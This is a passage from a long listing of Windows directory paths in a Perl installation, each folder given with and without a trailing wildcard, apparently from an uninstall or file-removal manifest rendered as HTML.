c:\Perl\perl\lib\auto\Term\*<br />
c:\Perl\perl\lib\auto\Term<br />
c:\Perl\perl\lib\auto\Term\ANSIColor\*<br />
c:\Perl\perl\lib\auto\Term\ANSIColor<br />
c:\Perl\perl\lib\auto\Term\ReadLine\*<br />
c:\Perl\perl\lib\auto\Term\ReadLine<br />
c:\Perl\perl\lib\auto\Term\UI\*<br />
c:\Perl\perl\lib\auto\Term\UI<br />
c:\Perl\perl\lib\auto\Test\*<br />
c:\Perl\perl\lib\auto\Test<br />
c:\Perl\perl\lib\auto\Test\Harness\*<br />
c:\Perl\perl\lib\auto\Test\Harness<br />
c:\Perl\perl\lib\auto\Test\Simple\*<br />
c:\Perl\perl\lib\auto\Test\Simple<br />
c:\Perl\perl\lib\auto\Text\*<br />
c:\Perl\perl\lib\auto\Text<br />
c:\Perl\perl\lib\auto\Text\Soundex\*<br />
c:\Perl\perl\lib\auto\Text\Soundex<br />
c:\Perl\perl\lib\auto\Thread\*<br />
c:\Perl\perl\lib\auto\Thread<br />
c:\Perl\perl\lib\auto\Thread\Queue\*<br />
c:\Perl\perl\lib\auto\Thread\Queue<br />
c:\Perl\perl\lib\auto\Thread\Semaphore\*<br />
c:\Perl\perl\lib\auto\Thread\Semaphore<br />
c:\Perl\perl\lib\auto\threads\*<br />
c:\Perl\perl\lib\auto\threads<br />
c:\Perl\perl\lib\auto\threads\shared\*<br />
c:\Perl\perl\lib\auto\threads\shared<br />
c:\Perl\perl\lib\auto\Tie\*<br />
c:\Perl\perl\lib\auto\Tie<br />
c:\Perl\perl\lib\auto\Tie\RefHash\*<br />
c:\Perl\perl\lib\auto\Tie\RefHash<br />
c:\Perl\perl\lib\auto\Time\*<br />
c:\Perl\perl\lib\auto\Time<br />
c:\Perl\perl\lib\auto\Time\HiRes\*<br />
c:\Perl\perl\lib\auto\Time\HiRes<br />
c:\Perl\perl\lib\auto\Time\Local\*<br />
c:\Perl\perl\lib\auto\Time\Local<br />
c:\Perl\perl\lib\auto\Time\Piece\*<br />
c:\Perl\perl\lib\auto\Time\Piece<br />
c:\Perl\perl\lib\auto\Unicode\*<br />
c:\Perl\perl\lib\auto\Unicode<br />
c:\Perl\perl\lib\auto\Unicode\Collate\*<br />
c:\Perl\perl\lib\auto\Unicode\Collate<br />
c:\Perl\perl\lib\auto\Unicode\Normalize\*<br />
c:\Perl\perl\lib\auto\Unicode\Normalize<br />
c:\Perl\perl\lib\auto\version\*<br />
c:\Perl\perl\lib\auto\version<br />
c:\Perl\perl\lib\auto\version\vxs\*<br />
c:\Perl\perl\lib\auto\version\vxs<br />
c:\Perl\perl\lib\auto\Win32\*<br />
c:\Perl\perl\lib\auto\Win32<br />
c:\Perl\perl\lib\auto\Win32API\*<br />
c:\Perl\perl\lib\auto\Win32API<br />
c:\Perl\perl\lib\auto\Win32API\File\*<br />
c:\Perl\perl\lib\auto\Win32API\File<br />
c:\Perl\perl\lib\auto\Win32CORE\*<br />
c:\Perl\perl\lib\auto\Win32CORE<br />
c:\Perl\perl\lib\auto\XSLoader\*<br />
c:\Perl\perl\lib\auto\XSLoader<br />
c:\Perl\perl\lib\autodie\*<br />
c:\Perl\perl\lib\autodie<br />
c:\Perl\perl\lib\autodie\exception\*<br />
c:\Perl\perl\lib\autodie\exception<br />
c:\Perl\perl\lib\B\*<br />
c:\Perl\perl\lib\B<br />
c:\Perl\perl\lib\B\Lint\*<br />
c:\Perl\perl\lib\B\Lint<br />
c:\Perl\perl\lib\Carp\*<br />
c:\Perl\perl\lib\Carp<br />
c:\Perl\perl\lib\CGI\*<br />
c:\Perl\perl\lib\CGI<br />
c:\Perl\perl\lib\Class\*<br />
c:\Perl\perl\lib\Class<br />
c:\Perl\perl\lib\Compress\*<br />
c:\Perl\perl\lib\Compress<br />
c:\Perl\perl\lib\Compress\Raw\*<br />
c:\Perl\perl\lib\Compress\Raw<br />
c:\Perl\perl\lib\Config\*<br />
c:\Perl\perl\lib\Config<br />
c:\Perl\perl\lib\CORE\*<br />
c:\Perl\perl\lib\CORE<br />
c:\Perl\perl\lib\CORE\arpa\*<br />
c:\Perl\perl\lib\CORE\arpa<br />
c:\Perl\perl\lib\CORE\sys\*<br />
c:\Perl\perl\lib\CORE\sys<br />
c:\Perl\perl\lib\CPAN\*<br />
c:\Perl\perl\lib\CPAN<br />
c:\Perl\perl\lib\CPAN\API\*<br />
c:\Perl\perl\lib\CPAN\API<br />
c:\Perl\perl\lib\CPAN\Exception\*<br />
c:\Perl\perl\lib\CPAN\Exception<br />
c:\Perl\perl\lib\CPAN\FTP\*<br />
c:\Perl\perl\lib\CPAN\FTP<br />
c:\Perl\perl\lib\CPAN\HTTP\*<br />
c:\Perl\perl\lib\CPAN\HTTP<br />
c:\Perl\perl\lib\CPAN\Kwalify\*<br />
c:\Perl\perl\lib\CPAN\Kwalify<br />
c:\Perl\perl\lib\CPAN\LWP\*<br />
c:\Perl\perl\lib\CPAN\LWP<br />
c:\Perl\perl\lib\CPANPLUS\*<br />
c:\Perl\perl\lib\CPANPLUS<br />
c:\Perl\perl\lib\CPANPLUS\Backend\*<br />
c:\Perl\perl\lib\CPANPLUS\Backend<br />
c:\Perl\perl\lib\CPANPLUS\Configure\*<br />
c:\Perl\perl\lib\CPANPLUS\Configure<br />
c:\Perl\perl\lib\CPANPLUS\Dist\*<br />
c:\Perl\perl\lib\CPANPLUS\Dist<br />
c:\Perl\perl\lib\CPANPLUS\Dist\Build\*<br />
c:\Perl\perl\lib\CPANPLUS\Dist\Build<br />
c:\Perl\perl\lib\CPANPLUS\Internals\*<br />
c:\Perl\perl\lib\CPANPLUS\Internals<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Constants\*<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Constants<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Source\*<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Source<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Source\SQLite\*<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Source\SQLite<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Utils\*<br />
c:\Perl\perl\lib\CPANPLUS\Internals\Utils<br />
c:\Perl\perl\lib\CPANPLUS\Module\*<br />
c:\Perl\perl\lib\CPANPLUS\Module<br />
c:\Perl\perl\lib\CPANPLUS\Module\Author\*<br />
c:\Perl\perl\lib\CPANPLUS\Module\Author<br />
c:\Perl\perl\lib\CPANPLUS\Shell\*<br />
c:\Perl\perl\lib\CPANPLUS\Shell<br />
c:\Perl\perl\lib\CPANPLUS\Shell\Default\*<br />
c:\Perl\perl\lib\CPANPLUS\Shell\Default<br />
c:\Perl\perl\lib\CPANPLUS\Shell\Default\Plugins\*<br />
c:\Perl\perl\lib\CPANPLUS\Shell\Default\Plugins<br />
c:\Perl\perl\lib\Data\*<br />
c:\Perl\perl\lib\Data<br />
c:\Perl\perl\lib\DBM_Filter\*<br />
c:\Perl\perl\lib\DBM_Filter<br />
c:\Perl\perl\lib\Devel\*<br />
c:\Perl\perl\lib\Devel<br />
c:\Perl\perl\lib\Devel\DProf\*<br />
c:\Perl\perl\lib\Devel\DProf<br />
c:\Perl\perl\lib\Digest\*<br />
c:\Perl\perl\lib\Digest<br />
c:\Perl\perl\lib\Encode\*<br />
c:\Perl\perl\lib\Encode<br />
c:\Perl\perl\lib\Encode\CN\*<br />
c:\Perl\perl\lib\Encode\CN<br />
c:\Perl\perl\lib\Encode\JP\*<br />
c:\Perl\perl\lib\Encode\JP<br />
c:\Perl\perl\lib\Encode\KR\*<br />
c:\Perl\perl\lib\Encode\KR<br />
c:\Perl\perl\lib\Encode\MIME\*<br />
c:\Perl\perl\lib\Encode\MIME<br />
c:\Perl\perl\lib\Encode\MIME\Header\*<br />
c:\Perl\perl\lib\Encode\MIME\Header<br />
c:\Perl\perl\lib\Encode\Unicode\*<br />
c:\Perl\perl\lib\Encode\Unicode<br />
c:\Perl\perl\lib\encoding\*<br />
c:\Perl\perl\lib\encoding<br />
c:\Perl\perl\lib\Exporter\*<br />
c:\Perl\perl\lib\Exporter<br />
c:\Perl\perl\lib\ExtUtils\*<br />
c:\Perl\perl\lib\ExtUtils<br />
c:\Perl\perl\lib\ExtUtils\CBuilder\*<br />
c:\Perl\perl\lib\ExtUtils\CBuilder<br />
c:\Perl\perl\lib\ExtUtils\CBuilder\Platform\*<br />
c:\Perl\perl\lib\ExtUtils\CBuilder\Platform<br />
c:\Perl\perl\lib\ExtUtils\Command\*<br />
c:\Perl\perl\lib\ExtUtils\Command<br />
c:\Perl\perl\lib\ExtUtils\Constant\*<br />
c:\Perl\perl\lib\ExtUtils\Constant<br />
c:\Perl\perl\lib\ExtUtils\Liblist\*<br />
c:\Perl\perl\lib\ExtUtils\Liblist<br />
c:\Perl\perl\lib\ExtUtils\MakeMaker\*<br />
c:\Perl\perl\lib\ExtUtils\MakeMaker<br />
c:\Perl\perl\lib\File\*<br />
c:\Perl\perl\lib\File<br />
c:\Perl\perl\lib\File\Spec\*<br />
c:\Perl\perl\lib\File\Spec<br />
c:\Perl\perl\lib\Filter\*<br />
c:\Perl\perl\lib\Filter<br />
c:\Perl\perl\lib\Filter\Util\*<br />
c:\Perl\perl\lib\Filter\Util<br />
c:\Perl\perl\lib\Getopt\*<br />
c:\Perl\perl\lib\Getopt<br />
c:\Perl\perl\lib\Hash\*<br />
c:\Perl\perl\lib\Hash<br />
c:\Perl\perl\lib\Hash\Util\*<br />
c:\Perl\perl\lib\Hash\Util<br />
c:\Perl\perl\lib\I18N\*<br />
c:\Perl\perl\lib\I18N<br />
c:\Perl\perl\lib\I18N\LangTags\*<br />
c:\Perl\perl\lib\I18N\LangTags<br />
c:\Perl\perl\lib\inc\*<br />
c:\Perl\perl\lib\inc<br />
c:\Perl\perl\lib\inc\latest\*<br />
c:\Perl\perl\lib\inc\latest<br />
c:\Perl\perl\lib\IO\*<br />
c:\Perl\perl\lib\IO<br />
c:\Perl\perl\lib\IO\Compress\*<br />
c:\Perl\perl\lib\IO\Compress<br />
c:\Perl\perl\lib\IO\Compress\Adapter\*<br />
c:\Perl\perl\lib\IO\Compress\Adapter<br />
c:\Perl\perl\lib\IO\Compress\Base\*<br />
c:\Perl\perl\lib\IO\Compress\Base<br />
c:\Perl\perl\lib\IO\Compress\Gzip\*<br />
c:\Perl\perl\lib\IO\Compress\Gzip<br />
c:\Perl\perl\lib\IO\Compress\Zip\*<br />
c:\Perl\perl\lib\IO\Compress\Zip<br />
c:\Perl\perl\lib\IO\Compress\Zlib\*<br />
c:\Perl\perl\lib\IO\Compress\Zlib<br />
c:\Perl\perl\lib\IO\Socket\*<br />
c:\Perl\perl\lib\IO\Socket<br />
c:\Perl\perl\lib\IO\Uncompress\*<br />
c:\Perl\perl\lib\IO\Uncompress<br />
c:\Perl\perl\lib\IO\Uncompress\Adapter\*<br />
c:\Perl\perl\lib\IO\Uncompress\Adapter<br />
c:\Perl\perl\lib\IPC\*<br />
c:\Perl\perl\lib\IPC<br />
c:\Perl\perl\lib\List\*<br />
c:\Perl\perl\lib\List<br />
c:\Perl\perl\lib\List\Util\*<br />
c:\Perl\perl\lib\List\Util<br />
c:\Perl\perl\lib\Locale\*<br />
c:\Perl\perl\lib\Locale<br />
c:\Perl\perl\lib\Locale\Codes\*<br />
c:\Perl\perl\lib\Locale\Codes<br />
c:\Perl\perl\lib\Locale\Maketext\*<br />
c:\Perl\perl\lib\Locale\Maketext<br />
c:\Perl\perl\lib\Log\*<br />
c:\Perl\perl\lib\Log<br />
c:\Perl\perl\lib\Log\Message\*<br />
c:\Perl\perl\lib\Log\Message<br />
c:\Perl\perl\lib\Math\*<br />
c:\Perl\perl\lib\Math<br />
c:\Perl\perl\lib\Math\BigFloat\*<br />
c:\Perl\perl\lib\Math\BigFloat<br />
c:\Perl\perl\lib\Math\BigInt\*<br />
c:\Perl\perl\lib\Math\BigInt<br />
c:\Perl\perl\lib\Memoize\*<br />
c:\Perl\perl\lib\Memoize<br />
c:\Perl\perl\lib\MIME\*<br />
c:\Perl\perl\lib\MIME<br />
c:\Perl\perl\lib\Module\*<br />
c:\Perl\perl\lib\Module<br />
c:\Perl\perl\lib\Module\Build\*<br />
c:\Perl\perl\lib\Module\Build<br />
c:\Perl\perl\lib\Module\Build\Platform\*<br />
c:\Perl\perl\lib\Module\Build\Platform<br />
c:\Perl\perl\lib\Module\Load\*<br />
c:\Perl\perl\lib\Module\Load<br />
c:\Perl\perl\lib\Module\Pluggable\*<br />
c:\Perl\perl\lib\Module\Pluggable<br />
c:\Perl\perl\lib\Net\*<br />
c:\Perl\perl\lib\Net<br />
c:\Perl\perl\lib\Net\FTP\*<br />
c:\Perl\perl\lib\Net\FTP<br />
c:\Perl\perl\lib\Object\*<br />
c:\Perl\perl\lib\Object<br />
c:\Perl\perl\lib\overload\*<br />
c:\Perl\perl\lib\overload<br />
c:\Perl\perl\lib\Package\*<br />
c:\Perl\perl\lib\Package<br />
c:\Perl\perl\lib\Params\*<br />
c:\Perl\perl\lib\Params<br />
c:\Perl\perl\lib\Parse\*<br />
c:\Perl\perl\lib\Parse<br />
c:\Perl\perl\lib\Parse\CPAN\*<br />
c:\Perl\perl\lib\Parse\CPAN<br />
c:\Perl\perl\lib\PerlIO\*<br />
c:\Perl\perl\lib\PerlIO<br />
c:\Perl\perl\lib\PerlIO\via\*<br />
c:\Perl\perl\lib\PerlIO\via<br />
c:\Perl\perl\lib\Pod\*<br />
c:\Perl\perl\lib\Pod<br />
c:\Perl\perl\lib\Pod\Perldoc\*<br />
c:\Perl\perl\lib\Pod\Perldoc<br />
c:\Perl\perl\lib\Pod\Simple\*<br />
c:\Perl\perl\lib\Pod\Simple<br />
c:\Perl\perl\lib\Pod\Text\*<br />
c:\Perl\perl\lib\Pod\Text<br />
c:\Perl\perl\lib\pods\*<br />
c:\Perl\perl\lib\pods<br />
c:\Perl\perl\lib\Scalar\*<br />
c:\Perl\perl\lib\Scalar<br />
c:\Perl\perl\lib\Scalar\Util\*<br />
c:\Perl\perl\lib\Scalar\Util<br />
c:\Perl\perl\lib\Search\*<br />
c:\Perl\perl\lib\Search<br />
c:\Perl\perl\lib\Sys\*<br />
c:\Perl\perl\lib\Sys<br />
c:\Perl\perl\lib\TAP\*<br />
c:\Perl\perl\lib\TAP<br />
c:\Perl\perl\lib\TAP\Formatter\*<br />
c:\Perl\perl\lib\TAP\Formatter<br />
c:\Perl\perl\lib\TAP\Formatter\Console\*<br />
c:\Perl\perl\lib\TAP\Formatter\Console<br />
c:\Perl\perl\lib\TAP\Formatter\File\*<br />
c:\Perl\perl\lib\TAP\Formatter\File<br />
c:\Perl\perl\lib\TAP\Harness\*<br />
c:\Perl\perl\lib\TAP\Harness<br />
c:\Perl\perl\lib\TAP\Parser\*<br />
c:\Perl\perl\lib\TAP\Parser<br />
c:\Perl\perl\lib\TAP\Parser\Iterator\*<br />
c:\Perl\perl\lib\TAP\Parser\Iterator<br />
c:\Perl\perl\lib\TAP\Parser\Result\*<br />
c:\Perl\perl\lib\TAP\Parser\Result<br />
c:\Perl\perl\lib\TAP\Parser\Scheduler\*<br />
c:\Perl\perl\lib\TAP\Parser\Scheduler<br />
c:\Perl\perl\lib\TAP\Parser\Source\*<br />
c:\Perl\perl\lib\TAP\Parser\Source<br />
c:\Perl\perl\lib\TAP\Parser\SourceHandler\*<br />
c:\Perl\perl\lib\TAP\Parser\SourceHandler<br />
c:\Perl\perl\lib\TAP\Parser\YAMLish\*<br />
c:\Perl\perl\lib\TAP\Parser\YAMLish<br />
c:\Perl\perl\lib\Term\*<br />
c:\Perl\perl\lib\Term<br />
c:\Perl\perl\lib\Term\ReadLine\*<br />
c:\Perl\perl\lib\Term\ReadLine<br />
c:\Perl\perl\lib\Term\UI\*<br />
c:\Perl\perl\lib\Term\UI<br />
c:\Perl\perl\lib\Test\*<br />
c:\Perl\perl\lib\Test<br />
c:\Perl\perl\lib\Test\Builder\*<br />
c:\Perl\perl\lib\Test\Builder<br />
c:\Perl\perl\lib\Test\Builder\IO\*<br />
c:\Perl\perl\lib\Test\Builder\IO<br />
c:\Perl\perl\lib\Test\Builder\Tester\*<br />
c:\Perl\perl\lib\Test\Builder\Tester<br />
c:\Perl\perl\lib\Text\*<br />
c:\Perl\perl\lib\Text<br />
c:\Perl\perl\lib\Thread\*<br />
c:\Perl\perl\lib\Thread<br />
c:\Perl\perl\lib\threads\*<br />
c:\Perl\perl\lib\threads<br />
c:\Perl\perl\lib\Tie\*<br />
c:\Perl\perl\lib\Tie<br />
c:\Perl\perl\lib\Tie\Hash\*<br />
c:\Perl\perl\lib\Tie\Hash<br />
c:\Perl\perl\lib\Time\*<br />
c:\Perl\perl\lib\Time<br />
c:\Perl\perl\lib\Unicode\*<br />
c:\Perl\perl\lib\Unicode<br />
c:\Perl\perl\lib\Unicode\Collate\*<br />
c:\Perl\perl\lib\Unicode\Collate<br />
c:\Perl\perl\lib\Unicode\Collate\CJK\*<br />
c:\Perl\perl\lib\Unicode\Collate\CJK<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\*<br />
c:\Perl\perl\lib\Unicode\Collate\Locale<br />
c:\Perl\perl\lib\unicore\*<br />
c:\Perl\perl\lib\unicore<br />
c:\Perl\perl\lib\unicore\auxiliary\*<br />
c:\Perl\perl\lib\unicore\auxiliary<br />
c:\Perl\perl\lib\unicore\extracted\*<br />
c:\Perl\perl\lib\unicore\extracted<br />
c:\Perl\perl\lib\unicore\lib\*<br />
c:\Perl\perl\lib\unicore\lib<br />
c:\Perl\perl\lib\unicore\lib\Age\*<br />
c:\Perl\perl\lib\unicore\lib\Age<br />
c:\Perl\perl\lib\unicore\lib\AHex\*<br />
c:\Perl\perl\lib\unicore\lib\AHex<br />
c:\Perl\perl\lib\unicore\lib\Alpha\*<br />
c:\Perl\perl\lib\unicore\lib\Alpha<br />
c:\Perl\perl\lib\unicore\lib\Bc\*<br />
c:\Perl\perl\lib\unicore\lib\Bc<br />
c:\Perl\perl\lib\unicore\lib\BidiC\*<br />
c:\Perl\perl\lib\unicore\lib\BidiC<br />
c:\Perl\perl\lib\unicore\lib\BidiM\*<br />
c:\Perl\perl\lib\unicore\lib\BidiM<br />
c:\Perl\perl\lib\unicore\lib\Blk\*<br />
c:\Perl\perl\lib\unicore\lib\Blk<br />
c:\Perl\perl\lib\unicore\lib\Cased\*<br />
c:\Perl\perl\lib\unicore\lib\Cased<br />
c:\Perl\perl\lib\unicore\lib\Ccc\*<br />
c:\Perl\perl\lib\unicore\lib\Ccc<br />
c:\Perl\perl\lib\unicore\lib\CE\*<br />
c:\Perl\perl\lib\unicore\lib\CE<br />
c:\Perl\perl\lib\unicore\lib\CI\*<br />
c:\Perl\perl\lib\unicore\lib\CI<br />
c:\Perl\perl\lib\unicore\lib\CompEx\*<br />
c:\Perl\perl\lib\unicore\lib\CompEx<br />
c:\Perl\perl\lib\unicore\lib\CWCF\*<br />
c:\Perl\perl\lib\unicore\lib\CWCF<br />
c:\Perl\perl\lib\unicore\lib\CWCM\*<br />
c:\Perl\perl\lib\unicore\lib\CWCM<br />
c:\Perl\perl\lib\unicore\lib\CWKCF\*<br />
c:\Perl\perl\lib\unicore\lib\CWKCF<br />
c:\Perl\perl\lib\unicore\lib\CWL\*<br />
c:\Perl\perl\lib\unicore\lib\CWL<br />
c:\Perl\perl\lib\unicore\lib\CWT\*<br />
c:\Perl\perl\lib\unicore\lib\CWT<br />
c:\Perl\perl\lib\unicore\lib\CWU\*<br />
c:\Perl\perl\lib\unicore\lib\CWU<br />
c:\Perl\perl\lib\unicore\lib\Dash\*<br />
c:\Perl\perl\lib\unicore\lib\Dash<br />
c:\Perl\perl\lib\unicore\lib\Dep\*<br />
c:\Perl\perl\lib\unicore\lib\Dep<br />
c:\Perl\perl\lib\unicore\lib\DI\*<br />
c:\Perl\perl\lib\unicore\lib\DI<br />
c:\Perl\perl\lib\unicore\lib\Dia\*<br />
c:\Perl\perl\lib\unicore\lib\Dia<br />
c:\Perl\perl\lib\unicore\lib\Dt\*<br />
c:\Perl\perl\lib\unicore\lib\Dt<br />
c:\Perl\perl\lib\unicore\lib\Ea\*<br />
c:\Perl\perl\lib\unicore\lib\Ea<br />
c:\Perl\perl\lib\unicore\lib\Ext\*<br />
c:\Perl\perl\lib\unicore\lib\Ext<br />
c:\Perl\perl\lib\unicore\lib\Gc\*<br />
c:\Perl\perl\lib\unicore\lib\Gc<br />
c:\Perl\perl\lib\unicore\lib\GCB\*<br />
c:\Perl\perl\lib\unicore\lib\GCB<br />
c:\Perl\perl\lib\unicore\lib\GrBase\*<br />
c:\Perl\perl\lib\unicore\lib\GrBase<br />
c:\Perl\perl\lib\unicore\lib\GrExt\*<br />
c:\Perl\perl\lib\unicore\lib\GrExt<br />
c:\Perl\perl\lib\unicore\lib\Hex\*<br />
c:\Perl\perl\lib\unicore\lib\Hex<br />
c:\Perl\perl\lib\unicore\lib\Hst\*<br />
c:\Perl\perl\lib\unicore\lib\Hst<br />
c:\Perl\perl\lib\unicore\lib\Hyphen\*<br />
c:\Perl\perl\lib\unicore\lib\Hyphen<br />
c:\Perl\perl\lib\unicore\lib\IDC\*<br />
c:\Perl\perl\lib\unicore\lib\IDC<br />
c:\Perl\perl\lib\unicore\lib\Ideo\*<br />
c:\Perl\perl\lib\unicore\lib\Ideo<br />
c:\Perl\perl\lib\unicore\lib\IDS\*<br />
c:\Perl\perl\lib\unicore\lib\IDS<br />
c:\Perl\perl\lib\unicore\lib\IDSB\*<br />
c:\Perl\perl\lib\unicore\lib\IDSB<br />
c:\Perl\perl\lib\unicore\lib\IDST\*<br />
c:\Perl\perl\lib\unicore\lib\IDST<br />
c:\Perl\perl\lib\unicore\lib\In\*<br />
c:\Perl\perl\lib\unicore\lib\In<br />
c:\Perl\perl\lib\unicore\lib\Jg\*<br />
c:\Perl\perl\lib\unicore\lib\Jg<br />
c:\Perl\perl\lib\unicore\lib\JoinC\*<br />
c:\Perl\perl\lib\unicore\lib\JoinC<br />
c:\Perl\perl\lib\unicore\lib\Jt\*<br />
c:\Perl\perl\lib\unicore\lib\Jt<br />
c:\Perl\perl\lib\unicore\lib\Lb\*<br />
c:\Perl\perl\lib\unicore\lib\Lb<br />
c:\Perl\perl\lib\unicore\lib\LOE\*<br />
c:\Perl\perl\lib\unicore\lib\LOE<br />
c:\Perl\perl\lib\unicore\lib\Lower\*<br />
c:\Perl\perl\lib\unicore\lib\Lower<br />
c:\Perl\perl\lib\unicore\lib\Math\*<br />
c:\Perl\perl\lib\unicore\lib\Math<br />
c:\Perl\perl\lib\unicore\lib\NChar\*<br />
c:\Perl\perl\lib\unicore\lib\NChar<br />
c:\Perl\perl\lib\unicore\lib\NFCQC\*<br />
c:\Perl\perl\lib\unicore\lib\NFCQC<br />
c:\Perl\perl\lib\unicore\lib\NFDQC\*<br />
c:\Perl\perl\lib\unicore\lib\NFDQC<br />
c:\Perl\perl\lib\unicore\lib\NFKCQC\*<br />
c:\Perl\perl\lib\unicore\lib\NFKCQC<br />
c:\Perl\perl\lib\unicore\lib\NFKDQC\*<br />
c:\Perl\perl\lib\unicore\lib\NFKDQC<br />
c:\Perl\perl\lib\unicore\lib\Nt\*<br />
c:\Perl\perl\lib\unicore\lib\Nt<br />
c:\Perl\perl\lib\unicore\lib\Nv\*<br />
c:\Perl\perl\lib\unicore\lib\Nv<br />
c:\Perl\perl\lib\unicore\lib\OAlpha\*<br />
c:\Perl\perl\lib\unicore\lib\OAlpha<br />
c:\Perl\perl\lib\unicore\lib\ODI\*<br />
c:\Perl\perl\lib\unicore\lib\ODI<br />
c:\Perl\perl\lib\unicore\lib\OGrExt\*<br />
c:\Perl\perl\lib\unicore\lib\OGrExt<br />
c:\Perl\perl\lib\unicore\lib\OIDC\*<br />
c:\Perl\perl\lib\unicore\lib\OIDC<br />
c:\Perl\perl\lib\unicore\lib\OIDS\*<br />
c:\Perl\perl\lib\unicore\lib\OIDS<br />
c:\Perl\perl\lib\unicore\lib\OLower\*<br />
c:\Perl\perl\lib\unicore\lib\OLower<br />
c:\Perl\perl\lib\unicore\lib\OMath\*<br />
c:\Perl\perl\lib\unicore\lib\OMath<br />
c:\Perl\perl\lib\unicore\lib\OUpper\*<br />
c:\Perl\perl\lib\unicore\lib\OUpper<br />
c:\Perl\perl\lib\unicore\lib\PatSyn\*<br />
c:\Perl\perl\lib\unicore\lib\PatSyn<br />
c:\Perl\perl\lib\unicore\lib\PatWS\*<br />
c:\Perl\perl\lib\unicore\lib\PatWS<br />
c:\Perl\perl\lib\unicore\lib\Perl\*<br />
c:\Perl\perl\lib\unicore\lib\Perl<br />
c:\Perl\perl\lib\unicore\lib\QMark\*<br />
c:\Perl\perl\lib\unicore\lib\QMark<br />
c:\Perl\perl\lib\unicore\lib\Radical\*<br />
c:\Perl\perl\lib\unicore\lib\Radical<br />
c:\Perl\perl\lib\unicore\lib\SB\*<br />
c:\Perl\perl\lib\unicore\lib\SB<br />
c:\Perl\perl\lib\unicore\lib\Sc\*<br />
c:\Perl\perl\lib\unicore\lib\Sc<br />
c:\Perl\perl\lib\unicore\lib\SD\*<br />
c:\Perl\perl\lib\unicore\lib\SD<br />
c:\Perl\perl\lib\unicore\lib\Space\*<br />
c:\Perl\perl\lib\unicore\lib\Space<br />
c:\Perl\perl\lib\unicore\lib\STerm\*<br />
c:\Perl\perl\lib\unicore\lib\STerm<br />
c:\Perl\perl\lib\unicore\lib\Term\*<br />
c:\Perl\perl\lib\unicore\lib\Term<br />
c:\Perl\perl\lib\unicore\lib\UIdeo\*<br />
c:\Perl\perl\lib\unicore\lib\UIdeo<br />
c:\Perl\perl\lib\unicore\lib\Upper\*<br />
c:\Perl\perl\lib\unicore\lib\Upper<br />
c:\Perl\perl\lib\unicore\lib\VS\*<br />
c:\Perl\perl\lib\unicore\lib\VS<br />
c:\Perl\perl\lib\unicore\lib\WB\*<br />
c:\Perl\perl\lib\unicore\lib\WB<br />
c:\Perl\perl\lib\unicore\lib\XIDC\*<br />
c:\Perl\perl\lib\unicore\lib\XIDC<br />
c:\Perl\perl\lib\unicore\lib\XIDS\*<br />
c:\Perl\perl\lib\unicore\lib\XIDS<br />
c:\Perl\perl\lib\unicore\To\*<br />
c:\Perl\perl\lib\unicore\To<br />
c:\Perl\perl\lib\User\*<br />
c:\Perl\perl\lib\User<br />
c:\Perl\perl\lib\version\*<br />
c:\Perl\perl\lib\version<br />
c:\Perl\perl\lib\warnings\*<br />
c:\Perl\perl\lib\warnings<br />
c:\Perl\perl\lib\Win32API\*<br />
c:\Perl\perl\lib\Win32API<br />
c:\Perl\perl\lib\Win32API\File\*<br />
c:\Perl\perl\lib\Win32API\File<br />
c:\Perl\perl\site\*<br />
c:\Perl\perl\site<br />
c:\Perl\perl\site\bin\*<br />
c:\Perl\perl\site\bin<br />
c:\Perl\perl\site\lib\*<br />
c:\Perl\perl\site\lib<br />
c:\Perl\perl\vendor\*<br />
c:\Perl\perl\vendor<br />
c:\Perl\perl\vendor\lib\*<br />
c:\Perl\perl\vendor\lib<br />
c:\Perl\perl\vendor\lib\Algorithm\*<br />
c:\Perl\perl\vendor\lib\Algorithm<br />
c:\Perl\perl\vendor\lib\Alien\*<br />
c:\Perl\perl\vendor\lib\Alien<br />
c:\Perl\perl\vendor\lib\Alien\Tidyp\*<br />
c:\Perl\perl\vendor\lib\Alien\Tidyp<br />
c:\Perl\perl\vendor\lib\Apache\*<br />
c:\Perl\perl\vendor\lib\Apache<br />
c:\Perl\perl\vendor\lib\Apache\XMLRPC\*<br />
c:\Perl\perl\vendor\lib\Apache\XMLRPC<br />
c:\Perl\perl\vendor\lib\App\*<br />
c:\Perl\perl\vendor\lib\App<br />
c:\Perl\perl\vendor\lib\App\local\*<br />
c:\Perl\perl\vendor\lib\App\local<br />
c:\Perl\perl\vendor\lib\App\local\lib\*<br />
c:\Perl\perl\vendor\lib\App\local\lib<br />
c:\Perl\perl\vendor\lib\Archive\*<br />
c:\Perl\perl\vendor\lib\Archive<br />
c:\Perl\perl\vendor\lib\Archive\Zip\*<br />
c:\Perl\perl\vendor\lib\Archive\Zip<br />
c:\Perl\perl\vendor\lib\auto\*<br />
c:\Perl\perl\vendor\lib\auto<br />
c:\Perl\perl\vendor\lib\auto\Algorithm\*<br />
c:\Perl\perl\vendor\lib\auto\Algorithm<br />
c:\Perl\perl\vendor\lib\auto\Algorithm\Diff\*<br />
c:\Perl\perl\vendor\lib\auto\Algorithm\Diff<br />
c:\Perl\perl\vendor\lib\auto\Alien\*<br />
c:\Perl\perl\vendor\lib\auto\Alien<br />
c:\Perl\perl\vendor\lib\auto\Alien\Tidyp\*<br />
c:\Perl\perl\vendor\lib\auto\Alien\Tidyp<br />
c:\Perl\perl\vendor\lib\auto\App\*<br />
c:\Perl\perl\vendor\lib\auto\App<br />
c:\Perl\perl\vendor\lib\auto\App\local\*<br />
c:\Perl\perl\vendor\lib\auto\App\local<br />
c:\Perl\perl\vendor\lib\auto\App\local\lib\*<br />
c:\Perl\perl\vendor\lib\auto\App\local\lib<br />
c:\Perl\perl\vendor\lib\auto\App\local\lib\Win32Helper\*<br />
c:\Perl\perl\vendor\lib\auto\App\local\lib\Win32Helper<br />
c:\Perl\perl\vendor\lib\auto\Archive\*<br />
c:\Perl\perl\vendor\lib\auto\Archive<br />
c:\Perl\perl\vendor\lib\auto\Archive\Zip\*<br />
c:\Perl\perl\vendor\lib\auto\Archive\Zip<br />
c:\Perl\perl\vendor\lib\auto\BerkeleyDB\*<br />
c:\Perl\perl\vendor\lib\auto\BerkeleyDB<br />
c:\Perl\perl\vendor\lib\auto\Class\*<br />
c:\Perl\perl\vendor\lib\auto\Class<br />
